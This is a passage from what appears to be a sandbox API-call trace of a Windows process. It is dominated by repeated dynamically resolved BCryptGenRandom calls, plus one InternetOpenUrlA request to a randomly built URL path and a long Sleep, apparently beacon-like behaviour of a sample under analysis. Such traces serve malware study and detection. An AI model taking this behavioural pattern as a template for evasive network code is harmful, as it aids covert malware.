[0258.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0258.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0258.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02ac2, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x3a02ac2) returned 0x0 [0258.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.405] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.406] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0258.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.408] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.409] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.410] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.410] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0258.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02ae5, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x3a02ae5) returned 0x0 [0258.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0258.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0258.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.414] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.414] GetProcessHeap () returned 0x440000 [0258.414] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0258.414] lstrcpyA (in: lpString1=0x472f30, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0258.414] lstrcatA (in: lpString1="\x04", lpString2="/4qbtm2ybpnm6uoBzpg4scuCgwc1k3hdN7sw/dkk0hhjihveeahj4yGxmd8fux0h/t3BKjthysPazBHcdpwuFqixl9etthynqlnm6uztm5BJk035r/3ia1bmfx3p2c16MTc08iZcpj97sizafe5x/cefLteTMoEknRyhnxoZfp1sS/" | out: lpString1="\x04/4qbtm2ybpnm6uoBzpg4scuCgwc1k3hdN7sw/dkk0hhjihveeahj4yGxmd8fux0h/t3BKjthysPazBHcdpwuFqixl9etthynqlnm6uztm5BJk035r/3ia1bmfx3p2c16MTc08iZcpj97sizafe5x/cefLteTMoEknRyhnxoZfp1sS/") returned="\x04/4qbtm2ybpnm6uoBzpg4scuCgwc1k3hdN7sw/dkk0hhjihveeahj4yGxmd8fux0h/t3BKjthysPazBHcdpwuFqixl9etthynqlnm6uztm5BJk035r/3ia1bmfx3p2c16MTc08iZcpj97sizafe5x/cefLteTMoEknRyhnxoZfp1sS/" [0258.414] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0258.414] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/4qbtm2ybpnm6uoBzpg4scuCgwc1k3hdN7sw/dkk0hhjihveeahj4yGxmd8fux0h/t3BKjthysPazBHcdpwuFqixl9etthynqlnm6uztm5BJk035r/3ia1bmfx3p2c16MTc08iZcpj97sizafe5x/cefLteTMoEknRyhnxoZfp1sS/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0258.414] GetProcessHeap () returned 0x440000 [0258.414] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0258.415] GetProcessHeap () returned 0x440000 [0258.415] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02a50 | out: hHeap=0x440000) returned 1 [0258.415] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0258.415] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0258.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0258.415] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0258.415] Sleep (dwMilliseconds=0x18b20) [0258.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0258.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0258.523] GetProcessHeap () returned 0x440000 [0258.523] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5970 [0258.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0258.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5971, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x4f5971) returned 0x0 [0258.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0258.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0258.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0258.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0258.531] BCryptGenRandom (in: hAlgorithm=0x0, 